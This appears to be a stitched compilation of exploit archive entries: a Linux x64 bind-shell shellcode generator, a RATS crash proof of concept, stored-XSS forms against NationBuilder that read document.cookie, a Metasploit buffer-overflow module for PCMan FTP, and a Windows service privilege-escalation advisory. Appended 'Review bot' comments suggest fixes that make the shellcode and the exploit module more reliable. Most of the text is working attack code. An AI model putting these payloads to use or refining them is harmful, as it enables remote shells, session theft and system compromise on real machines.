VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

100
platforms/lin_x86-64/shellcode/39728.py
Executable file

@ -0,0 +1,100 @@
#!/bin/python
import socket
import sys
"""

Linux x64 - Bind Shell shellcode Generator

---------------------------------------------------------------------------------

Disassemby of bindshell - port 5600

Disassembly of section .text:0000000000400080 <.text>:
400080: 48 31 c0 xor %rax,%rax
400083: 48 31 f6 xor %rsi,%rsi
400086: 99 cltd
400087: 6a 29 pushq $0x29
400089: 58 pop %rax
40008a: ff c6 inc %esi
40008c: 6a 02 pushq $0x2
40008e: 5f pop %rdi
40008f: 0f 05 syscall
400091: 48 97 xchg %rax,%rdi
400093: 6a 02 pushq $0x2
400095: 66 c7 44 24 02 15 e0 movw $0xe015,0x2(%rsp) ;;;; 0xe015 - Port of 5600
40009c: 54 push %rsp
40009d: 5e pop %rsi
40009e: 52 push %rdx
40009f: 6a 10 pushq $0x10
4000a1: 5a pop %rdx
4000a2: 6a 31 pushq $0x31
4000a4: 58 pop %rax
4000a5: 0f 05 syscall
4000a7: 50 push %rax
4000a8: 5e pop %rsi
4000a9: 6a 32 pushq $0x32
4000ab: 58 pop %rax
4000ac: 0f 05 syscall
4000ae: 6a 2b pushq $0x2b
4000b0: 58 pop %rax
4000b1: 0f 05 syscall
4000b3: 48 97 xchg %rax,%rdi
4000b5: 6a 03 pushq $0x3
4000b7: 5e pop %rsi
4000b8: ff ce dec %esi
4000ba: b0 21 mov $0x21,%al
4000bc: 0f 05 syscall
4000be: 75 f8 jne 0x4000b8
4000c0: 48 31 c0 xor %rax,%rax
4000c3: 99 cltd
4000c4: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
4000cb: 2f 73 68
4000ce: 53 push %rbx
4000cf: 54 push %rsp
4000d0: 5f pop %rdi
4000d1: 6a 3b pushq $0x3b
4000d3: 58 pop %rax
4000d4: 0f 05 syscall
---------------------------------------------------------------------------------
b4ck 2 h4ck --- Ajith Kp [@ajithkp560] --- http://www.terminalcoders.blogspot.com

Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
"""
bann3r = '''
[][][][][][][][][][][][][][][][][][][][][][][]
[] []
[] c0d3d by Ajith Kp [ajithkp560] []
[] http://www.terminalcoders.blogspot.in []
[] []
[][][][][][][][][][][][][][][][][][][][][][][]
'''
print bann3r
usage = "Usage: "+sys.argv[0]+" <port number (501<= port <= 9997)>"
example = "Example: "+sys.argv[0]+" 5600"
code1 = "\\x48\\x31\\xc0\\x48\\x31\\xf6\\x99\\x6a\\x29\\x58\\xff\\xc6\\x6a\\x02\\x5f\\x0f\\x05\\x48\\x97\\x6a\\x02\\x66\\xc7\\x44\\x24\\x02"
code2 = "\\x54\\x5e\\x52\\x6a\\x10\\x5a\\x6a\\x31\\x58\\x0f\\x05\\x50\\x5e\\x6a\\x32\\x58\\x0f\\x05\\x6a\\x2b\\x58\\x0f\\x05\\x48\\x97\\x6a\\x03\\x5e\\xff\\xce\\xb0\\x21\\x0f\\x05\\x75\\xf8\\x48\\x31\\xc0\\x99\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x54\\x5f\\x6a\\x3b\\x58\\x0f\\x05"
if len(sys.argv)!=2:
print usage
print example
else:
port = "\\x"+("\\x").join([''.join(x) for x in zip(*[list(str(hex(socket.htons(int(sys.argv[1])))[2:])[z::2]) for z in range(2)])][::-1])#str(hex(socket.htons(int(sys.argv[1])))[2:])
sh311code = code1 + port + code2
print '// Port = '+sys.argv[0]+' --- (501<= port <= 9997)'
print '// Compile with'
print '// $ gcc -o output source.c'
print '// $ execstack -s output'
print '// $ ./output'
print '// $ ./output'
print '////////////////////////////////////////////\n'
print '# include <stdio.h>'
print 'char sh[] = "'+sh311code+'";'
print 'main(int argc, char **argv)'
print '''{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();'''
print '}'
print '\n////////////////////////////////////////////'

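Review bot: the port encoding in the `else:` branch is fragile, and the usage text promises a range the code does not deliver. `hex(socket.htons(port))[2:]` is not zero-padded, so for any port whose low byte is below 0x10 the string has three hex digits, the two-way `zip` pairing silently drops a nibble, and only one port byte is emitted; the advertised upper bound itself, 9997 = 0x270d, htons 0x0d27, hex "d27", fails this way, and nothing validates the `501<= port <= 9997` range printed in `usage`. Replace the whole expression with a zero-padded network-order format, e.g. `p = int(sys.argv[1])` followed by `port = "\\x%02x\\x%02x" % (p >> 8, p & 0xff)`, and reject ports that yield a 0x00 byte (ports below 256 or with a zero low byte), since a NUL is a bad character in most injection contexts even though this harness jumps straight into `sh[]`. Two smaller points in the same block: `print '// Port = '+sys.argv[0]+...` prints the script name, not the port, so it should be `sys.argv[1]`; and `print '// $ ./output'` is emitted twice.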
36
platforms/linux/dos/39733.py
Executable file

@ -0,0 +1,36 @@
# Exploit Title: RATS 2.3 Crash POC
# Date: 25th April 2016
# Exploit Author: David Silveiro
# Author Contact: twitter.com/david_silveiro
# Website: Xino.co.uk
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
# Version: RATS 2.3
# Tested on: Ubuntu 14.04 LTS
# CVE : 0 day

from shlex import split
from os import system


def crash():

try:
com = ('rats --AAAA')
return system(com)

except:
print("Is RATS installed?")



def main():

print("Author: David Silveiro ")
print("Website: Xino.co.uk ")
print("Title: POC RATS v2.3 Crash \n")

crash()


if __name__ == "__main__":
main()

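Review bot: `crash()` cannot tell whether RATS actually crashed. `os.system` does not raise when the binary is missing or when the child dies with a signal; it returns the shell's exit status, so the bare `except:` branch and its "Is RATS installed?" message are effectively unreachable, and a clean run and a segfault look the same to `main()`. Use `subprocess.run(["rats", "--AAAA"])`, catch `FileNotFoundError` for the not-installed case, and check `returncode` (negative on POSIX when the process was killed by a signal, -11 for SIGSEGV), then have `main()` report which of the two happened. `from shlex import split` is unused and can go. The header should also record what was observed (the signal, and ideally a gdb or ASan backtrace), since `--AAAA` on its own says nothing about where in the option parser the crash occurs.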
104
platforms/ruby/webapps/39730.txt
Executable file

@ -0,0 +1,104 @@
<!--


NationBuilder Multiple Stored XSS Vulnerabilities


Vendor: NATIONBUILDER WHQ
Product web page: http://www.nationbuilder.com
Affected version: unknown
Platform: Ruby

Summary: NationBuilder is a unique nonpartisan community
organizing system that brings together a comprehensive
suite of tools that today's leaders and creators need to
gather their tribes. Deeply social.

Desc: The application suffers from multiple stored XSS
vulnerabilities. Input passed to several POST parameters
is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context
of an affected site.

Tested on: Apache/2.2.22 (Ubuntu)
Phusion Passenger 4.0.48


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5318
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5318.php

Ruby client for NationBuilder API:
https://github.com/nationbuilder/nationbuilder-rb


11.04.2016

-->


#1 Stored XSS in 'signup[note]' POST parameter
----------------------------------------------
#
# PoC:
#

<html>
<body>
<form action="https://domain.local/admin/signups/2/background?screen=signup-header" method="POST">
<input type="hidden" name="utf8" value="%E2%9C%93" />
<input type="hidden" name="authenticity_token" value="0ch5v8vyarO/yzmWoLWtOKBVpOjVVaQe/V8yg5jfNO8=" />
<input type="hidden" name="signup[note]" value="<script>alert(onfirm(document.cookie)</script>" />
<input type="hidden" name="commit" value="Save background" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>



#2 Stored XSS in 'page_tag[name]' POST parameter
------------------------------------------------
#
# PoC:
#

<html>
<body>
<form action="https://domain.local/admin/sites/1/tags" method="POST">
<input type="hidden" name="utf8" value="%E2%9C%93" />
<input type="hidden" name="authenticity_token" value="0ch5v8vyarO/yzmWoLWtOKBVpOjVVaQe/V8yg5jfNO8=" />
<input type="hidden" name="page_tag[name]" value="<script>confirm(document.cookie)</script>" />
<input type="hidden" name="commit" value="Add tag" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>



#3 Stored XSS in 'page[slug]' and 'page[headline]' POST parameters
------------------------------------------------------------------
#
# PoC:
#

<html>
<body>
<form action="https://domain.local/admin/sites/1/pages/12?screen=seo" method="POST">
<input type="hidden" name="utf8" value="â" />
<input type="hidden" name="_method" value="put" />
<input type="hidden" name="authenticity_token" value="wAqOhULjnK8/H3ip+zE6yg3IHaGa6ggbjxOoN2tf30I=" />
<input type="hidden" name="page[title]" value="Volunteer - ZSL" />
<input type="hidden" name="page[slug]" value="volunteer_script_confirm_document_cookie_script" />
<input type="hidden" name="page[headline]" value="Volunteer<script>confirm(document.cookie)</script>" />
<input type="hidden" name="page[excerpt]" value="1" />
<input type="hidden" name="commit" value="Save page" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

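Review bot: the PoC #1 payload `<script>alert(onfirm(document.cookie)</script>` is malformed (`onfirm` is not a defined function and the parentheses do not balance), so even where the injection lands it raises a syntax error instead of demonstrating execution; use the same `<script>confirm(document.cookie)</script>` as PoC #2. In PoC #3 the `page[slug]` value is the already-stripped string `volunteer_script_confirm_document_cookie_script`, so the form as written only exercises `page[headline]` although the heading lists both parameters, and its `utf8` field carries a mis-encoded value ("â") where PoCs #1 and #2 send `%E2%9C%93`. All three forms also embed a fixed `authenticity_token`; that is a per-session Rails CSRF token, so these are reproduction aids for an already authenticated admin session rather than cross-site triggers, and the advisory should say so or note that the token must be replaced with a live one.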
68
platforms/win32/remote/39729.rb
Executable file

@ -0,0 +1,68 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

## Original Exploit Information ##
# Date: 29 Aug 2015
# Exploit Author: Koby
# Tested on: Windows XP SP3
# Link: https://www.exploit-db.com/exploits/38013/

## Software Information ##
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7

## Metasploit Module Information ##
# Date: 16 April 2016
# Exploit Author: Jonathan Smith
# Tested on: Windows XP SP2

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Ftp

def initialize(info = {})

super(update_info(info,

'Name' => 'PCMan RENAME overflow',

'Description' => 'This module exploits a buffer overflow in the RENAME command of PCMAN FTP Server 2.0.7. This requires authentication but anonymous credentials are enabled by default.',

'Author' => [ 'Metasploit module author: Jonathan Smith. Vulnerability originally discovered by Koby on 29 August 2015. Metasploit module developed 16 April 2016.'],

'Version' => '$Revision: 1 $',

'Platform' => ['win'],

'Targets' => [ [ 'Windows XP SP2', { } ],],

'DefaultTarget' => 0,

'License' => GPL_LICENSE,

'Payload' => {'BadChars' => "\x00\x0a\x0d"},

'DefaultOptions' => {'EXITFUNC' => 'process'}

))

end

def exploit

connect_login

exploitcode = "A" * 2004 + "\x65\x82\xA5\x7C" + make_nops(30) + payload.encoded

send_cmd( ['RENAME', exploitcode] , false )

disconnect

end

end

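Review bot: the return address in `exploit` is a bare magic constant, `"A" * 2004 + "\x65\x82\xA5\x7C" + ...`, with nothing saying which module it points into or which Windows build it was taken from, and the target table is `[ 'Windows XP SP2', { } ]` while the original advisory in the header was tested on XP SP3, so it is unclear which of the two the address matches. Move it into the target hash as `'Ret' => 0x7ca58265` with a comment naming the module and the instruction it lands on, and build the buffer with `[target.ret].pack('V')` so further targets can be added without touching `exploit`. The `'Payload'` hash should also carry a `'Space'` value, since nothing bounds `payload.encoded` after the 2004-byte offset, and the metadata lacks `'References' => [['EDB', '38013']]` and a `'DisclosureDate'` even though both facts already appear in the header comments. `'Version' => '$Revision: 1 $'` is a leftover SVN keyword and can be dropped.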
54
platforms/windows/local/39727.txt
Executable file

@ -0,0 +1,54 @@
# Exploit Title: CompuSource Systems - Real Time Home Banking - Local
Privilege Escalation/Arbitrary Code Execution
# Date: 2/25/16
# Exploit Author: singularitysec@gmail.com
# Vendor Homepage: https://www.css4cu.com
# : https://www.css4cu.com/Next/InfoSide/SoftwareSolutions.php
# Version: CompuSource Systems - Real Time Home Banking
# Tested on: Windows 7
# CVE : TBD

Note: Windows Server 2003/2008/2012 *may* be vulnerable, depending on
system configuration.

This vulnerability has been reference checked against multiple installs.
This configuration was identical across all systems tested.

Executables/Services:

%SystemRoot%/css50/csdir/RealTimeHomeBankingSvc.exe
HomeBankingService

Attack Detail:
The application installs with LOCAL SYSTEM service credentials in the
directory %SystemRoot%/css50/csdir


The executables that are installed, by default, allow AUTHENTICATED USERS
to modify, replace or alter the file. This would allow an attacker to
inject their code or replace the executable and have it run in the context
of the system.


This would allow complete compromise of a machine on which it was
installed, giving the process LOCAL SYSTEM access to the machine in
question. An attacker can replace the file or append code to the
executable, reboot the system or restart the service and it would then
compromise the machine. As LOCAL SYSTEM is the highest privilege level on a
machine, this allows total control and access to all parts of the system.


Remediation:

Remove the modify/write permissions on the executables to allow only
privileged users to alter the files.
Apply vendor patch when distributed.

Vulnerability Discovered: 2/25/16

Vendor Notified: 2/25/16


Website: www.information-paradox.net
This vulnerability was discovered by singularitysec@gmail.com. Please
credit the author in all references to this exploit.

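Review bot: the central claim, that AUTHENTICATED USERS can modify `RealTimeHomeBankingSvc.exe`, is stated but not evidenced anywhere in the advisory; include the ACL and service output it was verified against, e.g. `icacls "%SystemRoot%\css50\csdir\RealTimeHomeBankingSvc.exe"` showing the `(M)` or `(F)` entry for `NT AUTHORITY\Authenticated Users` or `BUILTIN\Users`, and `sc qc HomeBankingService` showing `SERVICE_START_NAME : LocalSystem` together with the `BINARY_PATH_NAME`. The install path is written with forward slashes (`%SystemRoot%/css50/csdir`), which is unusual for a Windows service path; confirm it against the `sc qc` output. The remediation should cover the directory as well as the file: if `csdir` itself grants Authenticated Users create or delete rights, tightening the executable's ACL alone does not help, because the file can simply be deleted and replaced with one that carries a new ACL.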